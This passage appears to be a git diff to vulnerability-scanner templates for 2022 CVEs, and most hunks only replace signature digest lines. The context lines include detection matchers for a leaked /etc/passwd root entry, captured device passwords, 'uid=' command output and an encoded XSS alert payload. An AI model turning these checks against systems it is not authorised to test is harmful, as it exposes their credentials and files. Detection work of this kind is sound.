--- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009147cc31d806c5ac3ec034f20bdbadcb50e5fb3725a895927423d89a37cb4f38022010ad07e614019500cffd259b4780fb9ec1419b5e054895d5937252e9c978ee51:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207cd57e7b2fada39f7bfbdc1c47e08b6cc3e2033749d606575119719e4582782f022100e91c2b5edbdf44912cecc64d7b33b34f556b90df32974a37ebcc00cd83967314:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index d587dc6fdd..77dc913ba8 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220585f4a961c7bc3ec4bdda03ff236c6d60deb2be657d1cc72fe73c4190b63f826022075bef5cfe0dfc174940e5fc7680784d80c3bdab1182f66858fe7f9c5aa3b1b0c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022015bc69d0faa2f246b4589b3336b044a4734b6f77dfc2c6913daf4359e47bdd200220107f00fd0153ffd1621e38460a44fcd13973eb1464533e472485345475b5c504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index eabdf8abae..85ffdd4b28 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -39,5 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "") && contains(tolower(body), "microweber")' condition: and - -# digest: 4b0a00483046022100fa6b64e93334900832b47ee485f7e9ace21451bc0dcdeee4540f3ce7e2c32635022100be242f505494d9f58ea7c4937deb1cd1ff2fa201e6547f4793ba9c970708b99d:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220353974f45f598efd128fa13d6b1eed70d3a2b5f4cc0756d4b165c1f568c62a270220732996f74891f0002d8a9cba81cf1f1e2b31aafc9a90a33b94f26fdd51774ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 298c46efcc..4672043674 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c82821098ca07017805185520ecf2825aea32f3bab2e031913e33e07632e504402203bc9d456d8d26a9fafc6f8640591da33dfa939fc8d70820adba954999bb6f364:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220102611d2e4ecd524afb868defcb296914a64ab4693925d669446ba0b5398907a022051a88e129fc16bc9e0361b709216332755765ef59a27797bc02fcdff9d3c6def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index 66e81d6aee..af9c389366 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a0046304402204e321ae2573d063e67e859d715e81105d3763663b1c1a4ecb8f79f7533f43ea402202a404db852d49effed4be7c7759a373af404ef1dd4ae519a9e50c64588fbb929:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e769dedcc5807ca47017e6170642d0a95c787bffbba186d2985f7af7b2a2281d022100c880c8be28b6c625187ee1056b1042d5894296762b9d9247c908d0c9801c70e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 479b2beae6..a099b6a0d6 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d2bd62248ab60c3c71b5f7705a660b45da422c932b7d40bb38b4bcf5f882b92d022078024626597fe30dc82819aa4751df0aca7d0e7f4b40ce18ead5bb1a82f29c17:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022020f09cb19fa4064ea313b8ca60da2d9e0a5503a4450701f9b8fe4c92a888bd7d022100bf687d1e8b6cea2315dbf05231020c7ee020eb629a61053088915df5186c6fca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index 4d42932d7c..a86e3c6130 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -44,5 +44,4 @@ http: - 'status_code == 200' - contains(body,'<\"?cmd=') condition: and - -# digest: 490a0046304402206da2fa97cd18c2a4952dee516d7079c77bf7b883224028643ab3220d5b49328f0220330beda5abe11cfd223765f290545f3105a6e376a4c9245d1e47fdd42218279e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022053f6e28d55b0130aa05f0cc08921d5c9c97e52ff8b24d0bf8c7aba0205bfdedf022015aeaefa602098286661d1e7e63a785efa1285daec5b67340ed165259c8f35ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 8c4a1961f9..b8cac98690 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -52,5 +52,4 @@ http: - '([A-Z0-9a-z]+)<\/sys\.passwd>' - '([a-z]+)<\/sys\.su\.name>' part: body - -# digest: 4a0a00473045022100944b5eed9f59b7693b06268ba6dfec407fa18035a2c55d9387f135ecceb1039202207bbb4dab24a0d014821f69fcaf1b42497bd795bb729a47526453db6a8ef98e21:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206572ef20586bfd23471611bb30d6d75b66c3dac372ddee3a34badf3f7f4bd1f40220095ccf8845ecec14084eecc91d73a6c9036b5ed567ec519563e9fe63d7447609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index f83a498494..7772b25d14 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b65cc7dbb58f2471bf1edfb39548a0d8706756ca9a1087b71ecdfdc986937b37022025bc762d8828eacba158a0b8335c425bc234736179de3bc208251e51ab73504d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210095fd5c166ef9cc3775632c38d10129e9174b4dc5de63018a373c681367aa5ca5022100a8496b0b3963573d4f371bf008ed1b475f6dc4ddd4d8bc89a7b39195bba22ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index f16946fc32..8f23c053b6 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202977172511eb7d1a3aa56239bd50d3437edf8ca652cf09c0c29d327c9a7da25a02200d92e6f3d282371d01f91be391db66ef960cb1bd4aa32bba88365b0e63737fcf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a0e796b6962e00d55dcb49569e563aae726756f52901759293299d6b5ded46fb022100d0d1f88ead0c0a1bb37e714af18e0ef79ddd250fae634af6ecb4da8dafc54531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index b02e0f136c..15568da8fb 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022052ea6e930e1c4523be0074e1520140ba207021d42add149ec84b6312f2f48d6802206b8e92d100327893ca14734f79f39792dd13d32ad910321aca31c438b003da8a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204ce2df4c1f7d07840b3d70ebcf41aabaf982548a6dd8489b3c2f6bbaba1b76410220369487efc241fa1edd3c9b86f2aee54d7b6d18d1cea9a5fe5daf0c952fa475e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 7e7fbc8c6f..bb65fc5380 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -52,5 +52,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' - -# digest: 4b0a00483046022100e063bd727f46f6740759e68a9c48219d24cb1d8af45bbea0dbf99dddf4e4187102210091e8651e7a4838b24a025f356b93a8d4114d2ccd5c4ebfe4fcfd4dc6bcfe23f0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022044d94046ab6536f2fcf46be484fe0eb79c43659397ce2aa2082ac969b32583d7022100c4e2131ef170e797e1959186e208bf31b293b33dab932e19f0d3e6363783e63f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 1fbae7a53b..c459f7c234 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -52,5 +52,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' - -# digest: 4b0a00483046022100a0e15381cdb14c0c7bc54990a78c15cec255c621fa7049c2bc4c373ea0d548790221008311d82a0a56c9d750305de07c9c0dd4e2c3e9e52a1fffc42a8b028dd5ffe796:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fb1682cd10c799d64afcf1cc9887ff869232f3f26d9721968271c09a4d2609750221009febacd5ce88ed80bdfe8849c3aa36d94785af59f15f16b6e0ec0166cceddf0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 53017c3d43..9f807c23c3 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204cd8dc71000ad12b84e0c68114fd3f8563582227e3cdcf157faa444d07258159022100a1380b29e0d001f931aae0e0c6e13e4702589db5cec9fb8ffc927dcaa1397ba5:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c1280faeb664addc8b877a90a9c4566b20e9afd6c6344f18d17d832ee18af07022073436e7cbd13339c0cf2ecc28cec9be478db02ebf9356deda85e0cf0593ec47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index bbeb61c9e3..dc9c961775 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202b6f2721413b8198fcc21d8cc9ef71b70ce349a113e55f8a1431e3267cb7581a022014da76947963fb41491e3994f22d19a0501cc531c06287ef8ff9c07205371740:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008adcb93f7c3d844e8730c2b4f17eb7ac740633accd63cfdc4f05c024332cc150022100ae0b386a166ee88bd5e2db54db7e4ab3bf95af2bddc85290e328917b9ddf31a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index 98561c7b1f..6bbed81c65 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and - -# digest: 4a0a00473045022100b5b68017ddd7c6f9ca943e22b5ee044079fb2fdf7b553dda4e3d221a87e9f10602207cf9cf36c2b9ce746259d053ec9b299964cebf59ca92b79e357d3408d815e715:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fa69d3466453057ee14dfcb994c2eddd79914f065d02532e4ea27358ff2145f0022100a2e6fde1fa273ce9e7d1c463a86eb875fa4e49b51af4258dfe443ec52addd1f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 9ee35e6487..a605cfd0af 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and - -# digest: 4a0a00473045022074ce5bae8c99badd71acb67b9c4ef01d7f45bb85438bd8666489f7cc666b8ded022100dfbae297b100054873b84efdba677b0737e17f07b30d44bba17bfa661ddb55aa:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200bc147785cf6bdf41dc3c2485c32190ca2ea49d4cad1fc694ec7ea7a75816b7902205478353ebeeb03b9b35167b4aed8e7f8dead6e69783fffa58abd7daf4cdd58d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 670eb30f78..c63f9d7eb6 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cae3358a481b97105b6254b843327eae349aea6558c337750ae3b335643632e102206e30fd807621cffcab1149abb7a717488b81cb447ec4a2a25ffefc29899befda:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022003aac81ebd7b7e0dca92cf759dcf3333a48f6fa6fa366702d1993efc224b928e0221009df2a2591b37a38483c878702583eb8d6c922faafae0a8233d49d8caa0edf3c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 0073dfa08e..456f0e42eb 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009f57d61b0a3a4dae2cb4ee0b8d16c8c3df033ed84b932ea122015b1efdbe9f2802202c6ca3dcd95e60f2988cc9879f3616298cc558bfac0422d77871c44b94a8ba3b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ddb34400fd0f5833907923ca4cc8e74f65a883ec3ccc1d648d9354a07482f4c6022050dfad430dcfb1da5febf2e8deab8f95f20442c6750e16c04fc93dd3ae21d128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index fb5f898f18..5a84c58d50 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100eb7ba91e7809429774778337e9d34188410e6de7f6a1c85a047bef1cc22514c7022100b7176f0a276b23ada4aa0090d6b153d1d8141cdef9a4b8366eb09da0deb7dd2a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022026ca8003aedd27c64d14cca8bb87045cf0eaa92b6de8fab20bbb562099de0558022029ac7f01e7aa556bd93fcec00b58b3ae7878633544bd133cf26ebce6bda33a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index d04b13c3fe..c40b78667f 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022031827a8941e2961d95c9227f4f8809bc7c6e0d5a72d07307f3faf7d71ca76c0a022037a2e3046c357baa27611012d4774ae8758f5345d9220f761cfc857640521900:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c62f9982e57d9079af3f46b49fc5456845baddebbec0d6d833b853f4d9e78cff022074173edd8ba594196ca8e20e0741dd0e3d6bc8f49ccf54267357c544967d2b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 34d936913d..30c4a4ac09 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -41,5 +41,4 @@ http: - 'contains(body, "wpb_jplayer_setting")' - 'contains(body, "")' condition: and - -# digest: 490a0046304402202c643a2beca8937a1dd8cfd3f753d421577ad8a0bba46f25cc8e0621776310d3022072f0035c3588a7033d5c41a295ab8272928f8ca34e00f1817eb56c283f02b4b7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200e1e20f92887a523e836eac153bbaebeacf12ddd31fc264e54be6b238ef68be302207dc031a746fb3f9cfbe2e381d62ea180f768c8a3811fc78f6b05069d094796d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 8c8b19d194..84649a2c57 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -69,5 +69,4 @@ http: - 'name="_wpnonce" value="([0-9a-z]+)" />' internal: true part: body - -# digest: 490a004630440220550be9f22f477e34dec7475c0e215d3f24c6a8e9ecc17c27f95fce30992cb0d002204e90ee78ea844c715e6d6bea1781d755c5d38633f031347a6830d7e2176f66cc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203d302bd0cb518c482159fd4d805a0cd1bd500e4b2871e0db5ddaa9338bdc21a602200200ec6b7148fa73055a7ddbb25d515b45d82b2db08d0d70eb50a40796bc2363:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 87cd76fd41..63ccf4ddd6 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100dff8b0113ab270ab97f274cc99e48ab29b8c67b6b47926bc4ce0ee264f11e13a0220109b8cb81867d1f1400aa32c782b5839552d70206bcb7a221bbea6216dcea246:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f9ac4df477caddc5ad04e2636cee53236b2163359d34a81005214828703f93f5022100df059f177ae3402e1adfcf9bece0528c83d4fe77918d4eb1b4d257186507a163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 2999128b31..0ebe7b0475 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -57,5 +57,4 @@ http: - "" - "" condition: or - -# digest: 4b0a00483046022100b0d2a16532d37ce58d83983fc25b4dd812f89714d63886c57ba9739db3724e6502210098aee31b49bdff2b7df4967e2018b2ea82469cdc5234a6f96cc6441f0407b961:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048fe9091956d519634013a9d18bda1b847392f83844e4902efefd5eca43c575c022100ffd075c26199d2835e1d3b49a56d52e4036eb233aa3d9c86ea4cf596b6a3cec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index c3063bb37f..6bc6af8777 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -63,5 +63,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204ced76aa77fae9325700953d83c05244de2cfb9f8d2fdc70f44bb1380824800b022071d29bd1703d4baeb0fc9594d51e02852dcbb22fe19b5658314b7b5ac6f9b86a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c758c38e4819e95a2cdac611a7a0235d1db08f2c11b48904a2e9d3deeb32fa45022077519d51110a8b0efcb93874fcef57cd523d110404bcce2d001f337d75a498bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 53aa877ef3..7b9402dff2 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022047e93b115b33da5bc4248d86f1114b42586d526351ac38ec1c954d913334db03022011c3561f946958358cae50daaaaf6ce28dc6b7562317d16b175de4aceb0a77b4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ce8662618fb274993f4372238eee47a13f4505ee3834177052f37300fe998d30022100c508861d5688caf77425631b9a47022c6510259480a27e44fd32f017b022659d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index d162761774..aea12d0586 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f9b093312dd4e72e572a6bfe550661fff148b93d0a9b74c04befcc74e59d935802205274001081141e84cf24051639fa84bedeb1d80cd7a77b54e03b80da7249cb8c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d13e97c67497abfd507d77e68226fa1e52730aa69099df2e1863e3fb08bc26dd022100affe43ccbb52b12e823a8ac9d566def2afacf7a6ce1b58cb4451653a2c82eb33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index a008e46681..4516d9db38 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -50,5 +50,4 @@ http: - 'contains(body_2, "Extension Options")' - 'contains(body_2, "&tab")' condition: and - -# digest: 4a0a0047304502202daf8070dab2b2bcda740a2867e86c2aba41e5204e59539416b1d191cb042be8022100f6f3118b1656fc0b6dc3dc3eda08e920ff7c12913491ee0bdc278a269d8146b6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e305e94bd648b70a5b01928fcdf1c71d59fe85249c9c26f19f29bca0d0a1c13402205f1584a4cddbf95c1f27ab79a3a25402347d5742e19ed326e77778ab5b6c9541:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 78187258b4..fadce95eb1 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -74,5 +74,4 @@ http: regex: - "dt:'(.*?)',cu:" internal: true - -# digest: 490a00463044022011c9c4f95ce885f3a984bfffa59b5e5f44ddc30d795ff757dce9be1c1de9558902206fb6bab07fa189156bf66e3463972c83c7dad259d0a57b7a12dd3ac2a78a3aa3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a91b49b3ede1ef25e12d124e6eb21528314383df3256ba196adab7a50a2c2b2402202bf7277a0446e7f46a58577be77dcecd0c30de5d81cf55f44674c4aa3d1d7f21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index d99413255a..1a2a64c82a 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -61,5 +61,4 @@ http: - "status_code == 200" - "contains(body_1, 'index')" condition: and - -# digest: 4a0a004730450220370e03d458edb1626502a4f6cc9c77bc6f75303a93d57b546ed6155527ab4bca022100b9342ccbab9b9dfcad4f224a146508fb32364229af913d951f6b95cb743b9f9a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022043bdf95cede213143d2f3aa58d06dba9db83cdd254c2265c24798c4d09b61602022100ac1b454d5ceba4a90cb049849f8a4d56fceff1982f8d169ad7ca1df424f06543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 60508bbee4..84af0a18e8 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -51,5 +51,4 @@ http: - type: regex regex: - "root:[x*]:0:0" - -# digest: 4a0a0047304502210087cf9f9ac42c7bef20a7184dad5a7504d600848a8bf8847843d2abe92417cc86022017f1cd361faf61fb68f0faafb4dc0b363d181a79ce59ec8be54b14353be5d77e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a60a5586c4e86431a0fdce44f80dbe7b2d8103e279a53b512ba9352bd3b0ebb0022100e6cc53a71410030f4a830fc16eebc2362619bacac42664535b7f632701a32678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index b164245e5d..626f547363 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -72,5 +72,4 @@ http: group: 1 regex: - 'uid=.*\(([a-z]+)\):' - -# digest: 490a0046304402201978023986b584c303669e8d98ee38a816e14f15f4f8b25a4f424d9fd24a003302204542ac38e31d958b995a4a15511a53e0b061b4a88340f899e44ea659ae45fb60:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202cbfbd33d7ad7af1673bc7dce7cdce7e143dee8c3c53e5fa0e07db40003a9c6d02201bd1b9ab09088cbd003af5b0fb23e75aa69723ffd36e1239adae49e1dd490e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index dfed6db7d0..54a56d25d8 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203da63c3accb8e897f34c92b282b46ce0c91c7b2e97a59b8d4a2d38ce5003d0db022071ac96f81a3692e5ae39a59aa3a0be7cb8b0295259cedb204626885a6de5fe36:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c143b4d35661ef71189a350e6660c7609fd4c247659aafd0ea5fa43afe6a7524022027165d05fdb6ecc63f9fb6bf24296cfd47fef1fb2357b01ac13d7aeea7dc13e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index d38255fcd1..73bd87225b 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -57,5 +57,4 @@ http: - 'status_code_2 == 200' - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')" condition: and - -# digest: 4b0a00483046022100b501ddcadcb129956b57f2a91f8f1c5ce9f4d6f87d5ed21bb562eaff4945fe0a022100ed4e544f595c826ae3b83a73e2cc5cea97a1efb76697ac3b58d34bfab2938383:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204d69836c717a4b6b04c047153a689275bf352003f682fb1446e30492b6a853db022100d3ec795b563c5461e2c0abac5a819bb12902cb2073a6cc22ff687db78d37d2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 0411877235..05cc7315d5 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cf7cc7b7ccf94fba835e30585beb438992d99105f58da02c98495778a2543358022000851e8e0dfad029df07ecd8a7970c72b7cd1f045b80964e047aa86c972c6266:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210095c6eb8b25e45d776691b84f3211039c7f2cf4ddca59b9f714ab5fab4e0b20f202203ad50084d18d6767b0f91741d3c22078dbed8857cd4e65f6f24ff80e6fe898f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 5d1e91c9f3..1ba8e93348 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -73,5 +73,4 @@ http: regex: - "(.*?)" internal: true - -# digest: 